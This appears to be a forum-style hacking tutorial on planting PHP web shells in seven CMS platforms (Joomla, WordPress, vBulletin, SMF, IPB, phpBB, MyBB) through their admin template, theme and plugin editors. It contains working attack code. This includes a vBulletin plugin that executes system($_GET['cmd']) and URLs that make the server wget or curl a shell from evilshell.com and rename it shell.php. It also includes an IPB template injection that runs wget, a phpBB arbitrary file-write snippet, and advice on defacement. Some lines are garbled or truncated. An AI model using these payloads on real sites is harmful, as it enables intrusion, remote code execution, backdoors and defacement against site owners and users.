1.Joomla Site:After Login into admin panel u will find Extensions on 5th No. expand this
click on it > Template Manager > check on any template (like beez,ja_purity)
Now click on Edit (right upper side)
after this click on Edit html
now paste ur shell code and click save...... Done
site.com/templates/template name/index.php
like site.com/templates/hjp/index.php
2.Wordpress:Login into admin panel
expand Appearance then click on editor > u will find style.css
now select 404.php on right side
paste ur shell code and click edit file
u can find shell in site.com/wp-content/themes/theme name u edit/404.php
3.Vbulletin:1-Log in admin cp
2-Under “Plugins & Products”, select Add New Plugin
3-Adjust the settings as follows:
Product: vBulletin
Hook Location: global_start
Title: (Anything …)
Execution Order: 5
Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean(); Plugin is Active : Yes
So in the end it should look like this:
4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager
5-Under whatever the default style is in the dropdown menu, select Edit Templates.
6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME.
7-Search
Code:
$header
Somewhere near the top. Replace it with:
Code:
$header
$execcod
e
8-Now go to the forum and add after the index.php
Code:
?cmd=wget
http://www.evilshell.com/shell.txt;mv shell.txt shell.php
So it looks like
Code:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php
What this does is shell.txt downloads, and renames shell.php
Now,
the shell must be located in the directory shell.php forums … If not,
then wget is disabled on that server, you can try alternative methods:
Code:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.evilshell.com/shell.txt > shell.php
Code:
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.evilshell.com/shell.txt shell.php
4.SMF:Login into adminpanel
u need to download any smf theme in zip format and put ur shell.php in it and save
admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php
after upload shell will find > site.com/Themes/theme name/shell.php
5.IPB: ( Cái này chưa gặp bao h`
)
Login admin panel > Look and Feel >Manage Languages, choose language > section (example) public_help
edit:
help.txt
Choose topic from list, or search for a topic
In right box add this code:
${${print $query='cd cache; wget
http://link_to_shell/shell.txt;mv shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}
When you add it, specify go on bottom
Now we go on:
http://www.site.com/index...?app=core&module=helpAnd our code we add will be done, and you will get your shell @ www,site.com/cache/shell.php
6.phpBB:login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html
At down of:
PHP Code:
[LEFT]
[/LEFT]
We add:
[PHP]
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
And save it.
Now go on:
http://www.site.com/forum...q.php?o=....com/shell.txtShell find in site path/shell.php
7.Mybb forum:Login admincp > Go to Templates and Styles, find default MyBB Theme is.
Then go to Templates,
expand templates that are used by the current theme.
Find Calendar templates,
click it. Click 'calender'. Above all the html code, paste this:
http://pastebin.com/eV1WngfMsave
shell will b find in site.com/calendar.php
note: if u got error like "code is danger unable to edit "
then simply paste ur deface code to deface calendar.php